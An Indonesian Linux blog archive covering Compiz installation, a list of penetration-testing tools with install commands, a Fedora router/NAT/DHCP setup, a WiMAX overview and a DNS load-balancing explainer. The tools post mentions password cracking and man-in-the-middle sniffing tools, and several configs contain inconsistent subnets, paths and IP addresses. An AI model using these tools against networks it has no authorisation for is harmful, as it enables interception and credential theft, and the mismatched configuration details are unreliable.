1.)Tahap pertama apabila kamu telah menginstal kompiz sebelumnya saya menyarankan meremovenya terlebih dahulu, alasanya agar sistem Compiz diperbaruhi. Terkadang saya mengalami kesulitan pada saat configurasi karena alasan tertentu Compiz rusak atau tidak aktif karena salah oprek. Alangkah lebih baiknya kita instal dari awal lagi, kalau belum di instal kamu bisa langsung ketahap yang ke 2.
#yum -y remove compiz

2.)lanjutkan dengan mengInstall rpmfusion (Livna, Freshrpms and Dribble) repository.
#rpm -Uvh http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm

3.)selanjutnya kita akan Instal compiz plugins yang terbaru.
#yum -y install compiz-fusion compiz-fusion-gnome compiz-fusion-extras compiz-fusion-extras-gnome compizconfig-backend-gconf compiz-manager gnome-compiz-manager ccsm fusion-icon fusion-icon-gtk emerald emerald-themes

4.)OK, setelah semua penginstalan paket telah komplite kita akan menuju tahap Configuring Auto Start.
Kita akan menuju ke menu di bawah ini :
System -> Preferences -> Personal -> Sessions

Click add

And type:

Name: Fusion Icon
Command: fusion-icon
Comment: Compiz Fusion Panel Applet

5.) Nah sekarang kita hanya perlu meng logof computer kita login kembali untuk melihat fusion icon.

6.) Keluarkan bakat seni kamu, dan berkreasilah dengan Kompiz & emerald-themes. :)

Semoga bermanfaat, mari sama-sama kita belajar lagi.

Have fun !!!

Tuesday, March 2, 2010

Security (Hacking) Tools di Ubuntu.

tutorial ini gue dedikasikan untuk temen2 yang masih bingung mau milih tols apa untuk di penetrasi jaringan, kalau kamu terbiasa bermain dengan backtrack 4 atau yang lainnya di OS tersebut sudah lengkap dalam satu paket saat penginstalan OS jdi lebih simple.

(kalau kamu pake fedora, debian, atau mandriva tinggal di sesuaikan cara penginstalan aja, sesuai distro yang kamu pakai berasal dari turunan kernel apa, cth: kalau di fedora yum -y, debian apt-get, ubuntu apt-get juga karena anaknya kernel debian juga hhe, gmpang kok dll.

Wireshark – Network Traffic Analyzer

Wireshark adalah tools untuk menganalisis lalu lintas paket data di jaringan. Lazim dipanggil sebagi SNIFFER (pengintai). Sniffer adalah tools yang berkemampuan menangkap paket data dalam jaringan Wireshark mampu mendecode paket data dalam banyak jenis protokol. Tersedia pada operasi sistem linux dan windows.

Install wireshark:

Buka terminal (seperti command prompt di windows), lalu ketikkan

#sudo aptitude install wireshark

Nessus – Remote Network Security Auditor

Nessus adalah scanner untuk mengetahui celah keamanan komputer, baik komputer anda atau komputer siapapun. Kemampuannya yang lengkap sebagai Vulnerability Scanner adalah nyata karena didukung dengan fitur high speed discovery, configuration auditing, asset profiling, sensitive data discovery, dan vulnerability analysis of our security posture.

Install NESSUS:

#sudo apt-get install nessus

NMAP – The Network Mapper

Adalah tools pemetaan jaringan (network) terbaik yang pernah ada sejauh ini. Panggunaannya yang praktis, konfigurasi yang mudah, dan kehandalannya dalam memetakan jaringan komputer di manapun. Dengan Nmap, anda dapat mengetahui komputer-komputer (hosts) apa saja yang sedang terhubung dalam sebuah jaringan, apa service (aplikasi) yang sedang dijalankan komputer itu (host), apa sistem operasi komputer yang dipakai, apa tipe firewall yang digunakan, dan karakteristik lainnya dari komputer.

Install NMAP:

#sudo apt-get install nmap

Etherape – Graphical Network Monitor Modeled after Etherman

Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.

Install Etherape:

#sudo apt-get install etherape

Kismet

Siapa yang tak kenal tools ini? Sebuah tools terbaik dan satu-satunya di dunia yang mampu mendeteksi setiap jaringan (network) wireless dengan sempurna tanpa cacat sekalipun jaringan tersebut telah berusaha disembunyikan. Dengan tools standar, kita kadang terkecoh bahwa ternyata ada jaringan yang tetap ada namun tak terpantau oleh komputer kita. Kismet adalah detektor jaringan wireless, sniffer, dan sistem pendeteksi penyusup pada komputer. Kismet dapat bekerja pada beragam tipe wireless card, dengan syarat wireless card kita memiliki fitur MODE MONITOR. Kismet dapat melakukan sniffing pada traffic-traffic 802.11b, 802.11a, dan 802.11g.

Install Kismet:

#sudo apt-get install kismet

Chkrootkit – Checks for signs of rootkits on the local system

Tools ini berfungsi melakukan identifikasi apakah sebuah komputer diinfeksi dengan rootkit. Apa itu tootkit? Ini dia jenis-jenis rootkit:

1. lrk3, lrk4, lrk5, lrk6 (and some variants);

2. Solaris rootkit;

3. FreeBSD rootkit;

4. t0rn (including latest variant);

5. Ambient’s Rootkit for Linux (ARK);

6. Ramen Worm;

7. rh[67]-shaper;

8. RSHA;

9. Romanian rootkit;

10. RK17;

11. Lion Worm;

12. Adore Worm.

Install Chkrootkit:

#sudo apt-get install chkrootkit

Rkhunter – Rootkit, backdoor, sniffer and exploit scanner

Tools ini sangat berguna dalam melakukan scanning system komputer kita terhadap keberadaan rootkit yang teridentifikasi berbahaya atau sangat mencurigakan, backdoors, sniffers, dan exploits.

Tools ini akan melakukan pemeriksaan berikut ini di komputer kita:

- MD5 hash changes;

- files commonly created by rootkits;

- executables with anomalous file permissions;

- suspicious strings in kernel modules;

- hidden files in system directories;

Dalam upaya scanning sistem yang optimal, anda harus mengecek sistem menggunakan RKHUNTER dan CHKROOTKIT.

Install Rkhunter:

#sudo apt-get install rkhunter

TCPDump – A powerful tool for network monitoring and data acquisition

Tools ini mengizinkan anda untuk melakukan dumping terhadap lalu lintas jaringan kompute. TCPDump juga dapat digunakan untuk menguji IPv4, ICMPv4, IPv6, ICMPv6, UDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS, dan banyak tipe paket data di jaringan. Selain itu, anda juga dapat menggunakan tools ini untuk melakukan track down masalah network, mendeteksi “Ping Attacks”, dan memonitor kegiatan network.

Instal TCPDump:

#sudo apt-get install tcpdump

SNORT – Flexible Network Intrusion Detection System

Ini adalah salah satu tools favorit saya dalam mendeteksi penyusup di jaringan. Kemampuan tools ini adalah yang tercanggih dalam mendeteksi attacks dan probes dalam network, seperti buffer overflows, stealth port scans, CGI attacks, SMB probes, dan lain-lain.

Instal Snort:

#sudo apt-get install snort

Firestarter – program for managing and observing your firewall

Firestarter adalah tools lengkap mesin Linux yang berfungsi sebagai firewall. Memiliki kemampuan real-time dalam menunjukkan probing penyerang pada mesin komputer.

Instal firestarter:

#sudo apt-get install firestarter

CLAMAV – anti-virus utility for Unix

Clam antivirus adalah antivirus yang didesain untuk mesin Linux. Antivirus ini berkemampuan melakukan scanning pada:

- format Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS, dan sebagainya

- seluruh format file mail

- seluruh format file dokument, termasuk file Microsoft Office dan file Mac Office seperti HTML, RTF dan PDF.

Instal Clamav:

#sudo apt-get install clamav

Netcat – TCP/IP swiss army knife

Netcat adalah sebuah tools simpel dari mesin linux yang berkemampuan membaca dan menuliskan paket-paket data di jaringan, baik yang berprotokol TCP maupun UDP.

Instal Netcat:

#sudo apt-get install netcat

John

Lebih terkenal dengan sebutan John the Ripper (JTR), adalah tools yang didesain untuk membantu administrator sistem dalam menemukan kelemahan password. Tools ini mampu digunakan dalam berbagai bentuk chipertext, termasuk Unix’s DES and MD5, Kerberos AFS passwords, Windows’ LM hashes, BSDI’s extended DES, dan OpenBSD’s Blowfish.

Bagi yang ingin melakukan cracking terhadap sebuah password, John the Ripper adalah jawaban terbaik.

Instal John the Ripper:

#sudo apt-get install john

Dnsniff – Various tools to sniff network traffic for cleartext insecurities

Dsniff adalah sebuah paket tools yang mengandung beberapa sub-tools di dalamnya untuk menyadap dan mengkreasikan jaringan.

Sub-sub tools itu adalah berikuti ini:

* arpspoof – Send out unrequested (and possibly forged) arp replies.

* dnsspoof – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.

* dsniff – password sniffer for several protocols.

* filesnarf – saves selected files sniffed from NFS traffic.

* macof – flood the local network with random MAC addresses.

* mailsnarf – sniffs mail on the LAN and stores it in mbox format.

* msgsnarf – record selected messages from different Instant Messengers.

* sshmitm – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.

* sshow – SSH traffic analyser.

* tcpkill – kills specified in-progress TCP connections.

* tcpnice – slow down specified TCP connections via “active” traffic shaping.

* urlsnarf – output selected URLs sniffed from HTTP traffic in CLF.

* webmitm – HTTP / HTTPS monkey-in-the-middle. transparently proxies.

* webspy – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

Install dsniff:

#sudo apt-get install dsniff

mungkin ini cukup, ntar coba search di google lagi, banyak2 pun klu ga di pake ntar mubazir :).

Sunday, February 28, 2010

Setting Router di Fedora 10

Router adalah alat yang dapat menghubungkan dua atau lebih jaringan komputer yang berbeda.Router berbeda dengan host karena router bisanya bukan berupa tujuan atau data traffic. Routing dari datagram IP biasanya telah dilakukan dengan software. Jadi fungsi routing dapat dilakukan oleh host yang mempunyai dua networks connection atau lebih.Pada dasarnya router adalah sebuah alat pada jaringan komputer yang bekerja di network layer pada lapisan OSI.
ok kita lanjutkan setting router nya.

mari kita setting main gateway nya (MGW) untuk apa main gateway..lah itu kan supaya bisa konek ke internet bos..oya sebelumnya kita minta ip dulu dari isp langganan kita jangan lupa juga netmask,broadcast dan dns nya. misalnya ip dari isp di kasih

Range : 202.159.121.0/29
IP : 202.159.121.2
Gateway : 202.159.121.1
Netmask : 255.255.255.248
Broadcast : 202.159.121.7
DNS1 : 202.159.0.10
DNS2 : 202.159.0.20

berarti kita mendapatkan ip 5 buah dari 202.159.121.2 - 202.159.121.6

1.Menkonfigurasi IP eth0 (default) dengan perintah:

vi /etc/sysconfig/network-scripts/ifcfg-eth0

[root@syawal all]$ vi /etc/sysconfig/network-scripts/ifcfg-eth0

lalu isi dengan :

DEVICE=eth0
BOOTPROTO=static
IPADDR=202.159.121.2
NETMASK=255.255.255.248
ONBOOT=yes
USERCTL=no

Untuk menyimpan configurasi dengan mengetik â€� :wq! â€Å“

2.Setting dns resolve

[root@syawal all]$ vi /etc/resolv.conf

lalu isi dengan nameserver dari isp kita tadi :

nameserver 202.159.0.10
nameserver 202.159.0.20

lalu simpen dengan menekan :wq

3.Setting ip_forwarding

[root@syawal all]$ vi /etc/sysctl.conf

rubah net.ipv4.ip_forward = 0 menjadi net.ipv4.ip_forward = 1
atau kalau gak ada net.ipv4.ip_forward = 0 tambahin net.ipv4.ip_forward = 1

simpen dengan menekan :wq

4.restart network

[root@syawal all]$ /etc/init.d/network restart
Shutting down interface eth0: [ OK ]
Shutting down loopback interface: [ OK ]
Disabling IPv4 packet forwarding: [ OK ]
Setting network parameters: [ OK ]
Bringing up loopback interface: [ OK ]
Bringing up interface eth0: [ OK ]

[root@syawal all]$#chkconfig –level 2345 network on

5.testing dengan ngeping ke default gateway 202.159.121.1

[root@syawal all]$ ping 202.159.121.1
PING 202.159.121.1 (202.159.121.1) 56(84) bytes of data.
64 bytes from 202.159.121.1: icmp_seq=1 ttl=63 time=0.356 ms
64 bytes from 202.159.121.1: icmp_seq=2 ttl=63 time=0.269 ms
64 bytes from 202.159.121.1: icmp_seq=3 ttl=63 time=0.267 ms
64 bytes from 202.159.121.1: icmp_seq=4 ttl=63 time=0.268 ms

— 202.159.121.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.267/0.290/0.356/0.038 ms

6.testing untuk ngeping google.com untuk ngecek dns nya
kalau muncul :

PING google.com (216.239.39.99) 56(84) bytes of data.

berarti dns kita untuk mgw dah bekerja, tapi kalau muncul :

ping: unknown host google.com

berarti dns yang kita isikan di /etc/resolve.conf masih salah,
silahkan cek lagi ke ISP nya

owalah ini sich sudah beres untuk setting mgw nya
supaya mgw ini bisa sekaligus di gunakan sebagai ns server
oleh client maka harus di install daemon bind atau
daemon nameserver yang lain
ataukalau sudah ada tinggal idupin Bind nya

[root@syawal all]# /etc/init.d/named restart
Stopping named: [ OK ]
Starting named: [ OK ]
[root@syawal all]#chkconfig –level 2345 named on

Setting IP MGW :

[root@syawal all]$ vi /etc/sysconfig/network

lalu isi dengan :

NETWORKING=yes
HOSTNAME=ali
GATEWAY=202.159.121.1
~

sekarang kita set ip untuk cliennya
misalnya ip ke client adalah :

192.168.0.1/24
IP : 192.168.0.1
netmask : 255.255.255.0
broadcast : 192.168.0.255
RANGE IP CLIENT : 192.168.0.2-192.168.0.254

Setting ip untuk eth1 (yang ke client)
1.memberi IP 192.168.0.1 di eth1

[root@syawal all]$ vi /etc/sysconfig/network-scripts/ifcfg-eth1

lalu isi dengan :

DEVICE=eth1
BOOTPROTO=static
IPADDR=192.168.0.1
NETMASK=255.255.255.0
BROADCAST=192.168.0.255
ONBOOT=yes
USERCTL=no

lalu simpen dengan menekan :wq

2.Restart networknya

[root@syawal all]$ /etc/init.d/network restart
Shutting down interface eth0: [ OK ]
Shutting down interface eth1: [ OK ]
Shutting down loopback interface: [ OK ]
Disabling IPv4 packet forwarding: [ OK ]
Setting network parameters: [ OK ]
Bringing up loopback interface: [ OK ]
Bringing up interface eth0: [ OK ]
Bringing up interface eth1: [ OK ]

3.Testing dengan cara ping ip eth1

[root@mgw walle]$ ping 192.168.0.1
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=63 time=0.356 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=63 time=0.269 ms
64 bytes from 192.168.0.1: icmp_seq=3 ttl=63 time=0.267 ms
64 bytes from 192.168.0.1: icmp_seq=4 ttl=63 time=0.268 ms

— 192.168.0.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.267/0.290/0.356/0.038 ms

Tinggal Setting IP computer client dengan ketentuan di bawah ini :

IP : 192.168.0.2 - 192.168.0.254
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

misal :

Client01
===============================
IP : 192.168.0.2
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

Client02
===============================
IP : 192.168.0.3
GATEWAY : 192.168.0.1
NETMASK : 255.255.255.0
BROADCAST : 192.168.0.255
NAMESERVER : 192.168.0.1

dan seterusnya sesuai banyaknya client,yang berubah hanya IP
untuk client windows maka setting IP
di bagian Start Menu/Setting/Control Panel/Network

setelah di setting ip client, maka coba ping ke 192.168.0.1
dari client,kalau berhasil berarti client dan MGW nya sudah tersambung.

Setting MGW supaya client bisa internat dengan menggunakan NAT

1.Matikan iptablesnya

[root@syawal all]$# /etc/init.d/iptables stop
Flushing all chains: [ OK ]
Removing user defined chains: [ OK ]
Resetting built-in chains to the default ACCEPT policy: [ OK ]

2.Tambahkan iptables untuk Source NAt sesuai dengan ip di eth0

[root@syawal all]# /sbin/iptables -t nat -A POSTROUTING
-o eth0 -s 192.168.0.0/24 -j SNAT –to-source 202.159.121.2
[root@syawal all]# /sbin/iptables-save > /etc/sysconfig/iptables
[root@syawal all]# /etc/init.d/iptables restart
Flushing all current rules and user defined chains: [ OK ]
Clearing all current rules and user defined chains: [ OK ]
Applying iptables firewall rules: [ OK ]
[root@syawal all]# iptables-save

disini standar sekali dan gak ada proteksi
untuk mengetest nya kita browser di client lalau buka google.com,
kalau jalan berati kita sudah berhasil )

sekarang kita coba dhcp
untuk menginstall dhcp cukup dengan perintah di bawah ini

1.Instal DHCP dengan perintah

[root@syawal all]# yum -y install dhcp

2. Copy DHCP dari user ke etc dengan perintah :

[root@syawal all]# cp /usr/share/doc/dhcp-3.0.5 /dhcpd.conf.sample /etc/dhcpd.conf

3.Edit settingan DHCP dengan perintah:

[root@syawal all]# vi /etc/dhcpd.conf
ddns-update-style none;
ignore client-updates;

subnet 192.168.1.0 netmask 255.255.255.0 {

# — default gateway
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;

option nis-domain â€Å“domain.orgâ€�;
option domain-name â€Å“domain.orgâ€�;
option domain-name-servers 203.84.136.2, 203.84.140.4;

# option time-offset -18000; # Eastern Standard Time
# option ntp-servers 192.168.1.1;
# option netbios-name-servers 192.168.1.1;
# — Selects point-to-point node (default is hybrid). Don’t change this unless
# — you understand Netbios very well
# option netbios-node-type 2;

range dynamic-bootp 192.168.1.128 192.168.1.254;
default-lease-time 21600;
max-lease-time 43200;

Seperti biasa simpan dengan mengetik � :wq!�

4. Jalankan DHCP dengan perintah:

[root@syawal all]# /etc/init.d/dhcpd start

kalo sudah di setting semua nya coba ping 192.168.0.1
nah itu dhcp nya harusnya udah jalan men tapi klo gak jalan juga..coba di restart lagi networknya yah
nah itu ketiga client tadi mari kita buat ip nya automatis jangan statik ya tapi dhcp juga men
buka control panel–pilih network connection –klik lagi local area conektion dan pilih general dan lagi pilih Internet Protocol (TCP/IP) dan pilih Properties dan terakir kali pilih Obtain an Ip addres automatically.klo computer client nya dapat ip dhcp berarti sudah sukses.
yang susah kalu ngambil connec dri modem spedy trus di pancarin ke AP dulu Baru dilanjuting ke Fedora Roter, kalau ada yang tahu mohon Tambahannya, biar sama2 belajar (Masih Newbie).

(BASIS DATA) Mengenal WiMAX (Worldwide Interoperability for Microwave Access)

WiMAX adalah singkatan dari Worldwide Interoperability for Microwave Access, merupakan teknologi akses nirkabel pita lebar (broadband wireless access atau disingkat BWA) yang memiliki kecepatan akses yang tinggi dengan jangkauan yang luas. WiMAX merupakan evolusi dari teknologi BWA sebelumnya dengan fitur-fitur yang lebih menarik. Disamping kecepatan data yang tinggi mampu diberikan, WiMAX juga merupakan teknologi dengan open standar. Dalam arti komunikasi perangkat WiMAX diantara beberapa vendor yang berbeda tetap dapat dilakukan (tidak proprietary). Dengan kecepatan data yang besar (sampai 70 MBps), WiMAX dapat diaplikasikan untuk koneksi broadband ‘last mile’, ataupun backhaul.

Perkembangan Teknologi Wireless

WiMax Standar BWA yang saat ini umum diterima dan secara luas digunakan adalah standar yang dikeluarkan oleh Institute of Electrical and Electronics Engineering (IEEE), seperti standar 802.15 untuk Personal Area Network (PAN), 802.11 untuk jaringan Wireless Fidelity (WiFi), dan 802.16 untuk jaringan Worldwide Interoperability for Microwave Access (WiMAX).

Pada jaringan selular juga telah dikembangkan teknologi yang dapat mengalirkan data yang overlay dengan jaringan suara seperti GPRS, EDGE, WCDMA, dan HSDPA. Masing-masing evolusi pada umumnya mengarah pada kemampuan menyediakan berbagai layanan baru atau mengarah pada layanan yang mampu menyalurkan voice, video dan data secara bersamaan (triple play). Sehingga strategi pengembangan layanan broadband wireless dibedakan menjadi Mobile Network Operator (MNO) dan Broadband Provider (BP).

Spektrum Frekuensi WiMAX

Sebagai teknologi yang berbasis pada frekuensi, kesuksesan WiMAX sangat bergantung pada ketersediaan dan kesesuaian spektrum frekuensi. Sistem wireless mengenal dua jenis band frekuensi yaitu Licensed Band dan Unlicensed Band. Licensed band membutuhkan lisensi atau otoritas dari regulator, yang mana operator yang memperoleh licensed band diberikan hak eksklusif untuk menyelenggarakan layanan dalam suatu area tertentu. Sementara Unlicensed Band yang tidak membutuhkan lisensi dalam penggunaannya memungkinkan setiap orang menggunakan frekuensi secara bebas di semua area.

WiMAX Forum menetapkan 2 band frekuensi utama pada certication profile untuk Fixed WiMAX (band 3.5 GHz dan 5.8 GHz), sementara untuk Mobile WiMAX ditetapkan 4 band frekuensi pada system profile release-1, yaitu band 2.3 GHz, 2.5 GHz, 3.3 GHz dan 3.5 GHz.

Secara umum terdapat beberapa alternatif frekuensi untuk teknologi WiMAX sesuai dengan peta frekuensi dunia. Dari alternatif tersebut band frekuensi 3,5 GHz menjadi frekuensi mayoritas Fixed WiMAX di beberapa negara, terutama untuk negara-negara di Eropa, Canada, Timur-Tengah, Australia dan sebagian Asia. Sementara frekuensi yang mayoritas digunakan untuk Mobile WiMAX adalah 2,5 GHz.

Isu frekuensi Fixed WiMAX di band 3,3 GHz ternyata hanya muncul di negara-negara Asia. Hal ini terkait dengan penggunaan band 3,5 GHz untuk komunikasi satelit, demikian juga dengan di Indonesia. Band 3,5 GHz di Indonesia digunakan oleh satelit Telkom dan PSN untuk memberikan layanan IDR dan broadcast TV. Dengan demikian penggunaan secara bersama antara satelit dan wireless terrestrial (BWA) di frekuensi 3,5 GHz akan menimbulkan potensi interferensi terutama di sisi satelit.

Elemen Perangkat WiMAX

Elemen/ perangkat WiMAX secara umum terdiri dari BS di sisi pusat dan CPE di sisi pelanggan. Namun demikian masih ada perangkat tambahan seperti antena, kabel dan asesoris lainnya.

Base Station (BS)

Merupakan perangkat transceiver (transmitter dan receiver) yang biasanya dipasang satu lokasi (colocated) dengan jaringan Internet Protocol (IP). Dari BS ini akan disambungkan ke beberapa CPE dengan media interface gelombang radio (RF) yang mengikuti standar WiMAX. Komponen BS terdiri dari:

* NPU (networking processing unit card)
* AU (access unit card)up to 6 +1
* PIU (power interface unit) 1+1
* AVU (air ventilation unit)
* PSU (power supply unit) 3+1

Antena

Antena yang dipakai di BS dapat berupa sektor 60°, 90°, atau 120° tergantung dari area yang akan dilayani.

Subscriber Station (SS)

Secara umum Subscriber Station (SS) atau (Customer Premises Equipment) CPE terdiri dari Outdoor Unit (ODU) dan Indoor Unit (IDU), perangkat radionya ada yang terpisah dan ada yang terintegrasi dengan antena.

Manfaat Membangun Jaringan LAN (Local Area Network)

Banyak keuntungan yang didapatkan dari terciptanya standardisasi industri ini. Para operator telekomunikasi dapat menghemat investasi perangkat, karena kemampuan WiMAX dapat melayani pelanggannya dengan area yang lebih luas dan tingkat kompatibilitas lebih tinggi. Selain itu, pasarnya juga lebih meluas karena WiMAX dapat mengisi celah broadband yang selama ini tidak terjangkau oleh teknologi Cable dan DSL (Digital Subscriber Line).

WiMAX salah satu teknologi memudahkan mereka mendapatkan koneksi Internet yang berkualitas dan melakukan aktivitas. Sementara media wireless selama ini sudah terkenal sebagai media yang paling ekonomis dalam mendapatkan koneksi Internet. Area coverage-nya sejauh 50 km maksimal dan kemampuannya menghantarkan data dengan transfer rate yang tinggi dalam jarak jauh, sehingga memberikan kontribusi sangat besar bagi keberadaan wireless MAN dan dapat menutup semua celah broadband yang ada saat ini. Dari segi kondisi saat proses komunikasinya, teknologi WiMAX dapat melayani para subscriber, baik yang berada dalam posisi Line Of Sight (posisi perangkat-perangkat yang ingin berkomunikasi masih berada dalam jarak pandang yang lurus dan bebas dari penghalang apa pun di depannya) dengan BTS maupun yang tidak memungkinkan untuk itu (Non-Line Of Sight). Jadi di mana pun para penggunanya berada, selama masih masuk dalam area coverage sebuah BTS (Base Transceiver Stations), mereka mungkin masih dapat menikmati koneksi yang dihantarkan oleh BTS tersebut.

Selain itu, dapat melayani baik para pengguna dengan antena tetap (fixed wireless) misalnya di gedung-gedung perkantoran, rumah tinggal, toko-toko, dan sebagainya, maupun yang sering berpindah-pindah tempat atau perangkat mobile lainnya. Mereka bisa merasakan nikmatnya ber-Internet broadband lewat media ini. Sementara range spektrum frekuensi yang tergolong lebar, maka para pengguna tetap dapat terkoneksi dengan BTS selama mereka berada dalam range frekuensi operasi dari BTS.

Sistem kerja MAC-nya (Media Access Control) yang ada pada Data Link Layer adalah connection oriented, sehingga memungkinkan penggunanya melakukan komunikasi berbentuk video dan suara. Siapa yang tidak mau, ber-Internet murah, mudah, dan nyaman dengan kualitas broadband tanpa harus repot-repot. Anda tinggal memasang PCI card yang kompatibel dengan standar WiMAX, atau tinggal membeli PCMCIA (Personal Computer Memory Card International Association) yang telah mendukung komunikasi dengan WiMAX. Atau mungkin Anda tinggal membeli antena portabel dengan interface ethernet yang bisa dibawa ke mana-mana untuk mendapatkan koneksi Internet dari BTS untuk fixed wireless.

PENGENALAN SERVER LOAD BALANCING, Fleet Management, GIS, Intelligent Transportation System, IT, ITS

Jaringan komputer adalah sebuah kumpulan komputer, printer dan peralatan lainnya yang terhubung. Informasi dan data bergerak melalui kabel-kabel sehingga memungkinkan pengguna jaringan komputer dapat saling bertukar dokumen dan data, mencetak pada printer yang sama dan bersama sama menggunakan hardware/software yang terhubung dengan jaringan. Tiap komputer, printer atau periferal yang terhubung dengan jaringan disebut node. Sebuah jaringan komputer dapat memiliki dua, puluhan, ribuan atau bahkan jutaan node.

Sebuah jaringan biasanya terdiri dari 2 atau lebih komputer yang saling berhubungan diantara satu dengan yang lain, dan saling berbagi sumber daya misalnya CDROM, Printer, pertukaran file, atau memungkinkan untuk saling berkomunikasi secara elektronik. Komputer yang terhubung tersebut, dimungkinkan berhubungan dengan media kabel, saluran telepon, gelombang radio, satelit, atau sinar infra merah.

Server Load Balancing (SLB) disini diartikan sebagai sebuah proses dan teknologi yang mendistribusikan trafik pada beberapa server dengan menggunakan perangkat-perangkat networking. Perangkat tersebut menerima sebuah trafik dari tempat tertentu kemudian trafik tersebut diarahkan ke beberapa server lainnya. Gambar berikut ini menunjukkan bagaimana terjadinya SLB :

Server Load Balancing berfungsi sebagai berikut :

1. menerima trafik dari sebuah network misalnya web traffic dan mengarahkannya ke site tertentu.
2. melakukan split trafik menjadi individual request dan menentukan server mana yang akan menerima individual request tersebut.
3. memantau server dengan menyakinkan bahwa server tersebut bertanggung jawab terhadap traffik.
4. memberikan redudansi dengan mengaktifkan server lebih dari satu unit melalui mekanisme fail-over.
5. menawarkan distribusi content seperti pembacaan URL, interconnecting cookies, dan XML parsing.

Awal Pemakaian

Internet awalnya digunakan sebagian besar oleh para akademisi dan sangat sedikit digunakan oleh orang umum. Ketika terjadi booming internet di tahun 1995 menjadikan sebuah server tunggal tidak akan mampu mengatasi dan memproses keinginan pengguna setiap harinya apalagi sejak internet digunakan dalam dunia perdagangan dengan e-commerce dan applikasi multimedia lainnya. Disaat seperti inilah orang mulai mencari cara untuk mengatasi redudansi kinerja server terhadap traffik yang terus meningkat.

Perkembangan

Jika sebuah server telah bekerja pada batas limitnya maka seorang administrator biasanya melakukan penambahan RAM atau melakukan upgrading processor untuk mendapatkan hasil yang lebih baik. Namun hal seperti itu tidak dapat terlalu membantu. Ada saatnya walaupun kita telah melakukan setting optimal terhadap hardware dan sistem operasi yang digunakan kegagalan server mesih sering terjadi.

DNS Load Balancing

Sebelum kita mengenal teknologi SLB, seorang server administrator terlebih dahulu harus menerapkan proses Load Balancing yang dikenal dengan DNS round robin. DNS roun robin menggunakan fungsi DNS untuk menggunakan satu IP address digunakan bersama pada sebuah hostname. Setiap entry DNS diketahui sebagai record yang memetakan sebuah hostname (misalnya www.nengnong.net) ke sebuah IP Address misalnya adalah 208.185.43.202. Biasanya hanya satu IP Addresss yang diberikan untuk satu hostname. Dengan ISO DNS server, BIND 8, maka DNS entri untuk www.nengnong.

Dengan DNS round robin maka dimungkinkan multiple IP address digunakna pada sebuah hostname yang dapat digunakan untuk mendistribusikan trafik sehingga tidak terlalu sibuk seperti halnya hanya menggunakan satu IP Address. Singkatnya disini kita bisa melihat tiga IP Address untuk sebuah web server yakni 208.185.43.202, 208.185.43.203, dan 208.185.43.204 yang di sharing dan di gunakan oleh www.nengnong.net. Konfigurasi DNS server untuk ketiga IP Address tersebut adalah seperti berikut :

IN A 202.185.43.203

IN A 202.185.43.204

Kita bisa cek effek dari penggunaan DNS dengan nslookup, seperti berikut :

[n3]# nslookup www.nengnong.net

Server: ns1.nengnong.net

Address: 198.143.25.15

Name: www.syawal all.blogspot

Addresses: 208.185.43.202, 208.185.43.203, 208.185.43.204

Dengan demikian distribusi trafik untuk www.nengnong.net terbagi menjadi tiga

Terlihat bahwa distribusi dengan DNS round robin sederhana, namun menggapa mesti menggunakan SLB? Alasannya adalah DNS round robin masih memiliki keterbatasan, distribusi trafik yang tidak dapat diprediksi, caching isue, dan pengukuran kesalahan yang sulit dilakukan.

DNS 101

DNS berasosiasi dengan IP address dengan sebuah hostname sehingga kita tidak perlu mengingat angka-angka yang rumit. Setiap komputer yang terhubung ke Internet harus memiliki IP Address. Ketika user mengetikan URL sebuah hostname pada Browser, maka sistem operasi akan mengirimkan queri untuk melakukan konfigurasi DNS Server terhadap hostname tersebut. DNS server tersebut biasanya tidak memberikan informasi (kecuali di cached) sehingga domain name server mencari nama domain dengan root server. Root server juga tidak memiliki informasi IP Address tapi mengetahui siapa yang memiliki kemudian memberikan laporan kepada DNS server user. Detail prosesnya dijelaskan seperti berikut :

1. User mengetikan URL ke dalam browser
2. Operating System melakukan DNS request untuk mengkonfigurasi DNS server.
3. DNS server melihat apakah ada IP Address yang di cached. Jika tidak maka melakukan query pada Root Server untuk mencari informasi DNS server yang dimaksudkan.
4. Root server kemudian membalas dengan authoritative DNS Server terhadap request dari hostname.
5. DNS server melakukan query terhadap auhoritative DNS server dan menerima respon.

Caching

Salah satu keterbatasan pada DNS round robin adalah DNS caching. Untuk mengindari DNS Server dari banyaknya request yang sama dan menjaga utilisasi bandtwith maka DNS Server melakukan DNS caching. Selama informasi pada DNS mengalami perubahan yang tidak berarti maka akan berfungsi seperti biasa. Namun jika DNS server memberikan masukan baru pada DNS maka sistem akan mencaching entri tersebut sampai entri tersebut expired.

Distribusi Trafik

Distribusi trafik juga merupakan salah satu masalah pada DNS round robin. DNS round robin akan mendistribusikan trafik pada IP Address yang telah diberikan pada sebuah hostname. Jika ada tiga IP Address yang diberikan maka trafik akan di distribusikan ke masing-masing ketiga IP tersebut. Jika ada empat IP address yang diberikan maka trafik akan didistribusikan pada keempat IP tersebut. Namun permasalahannya distribusi trafik sangat signifikan dan tidak selalu stabil. Gambar berikut menunjukan scenario failure pada DNS berbasis load balancing.

Evolusi

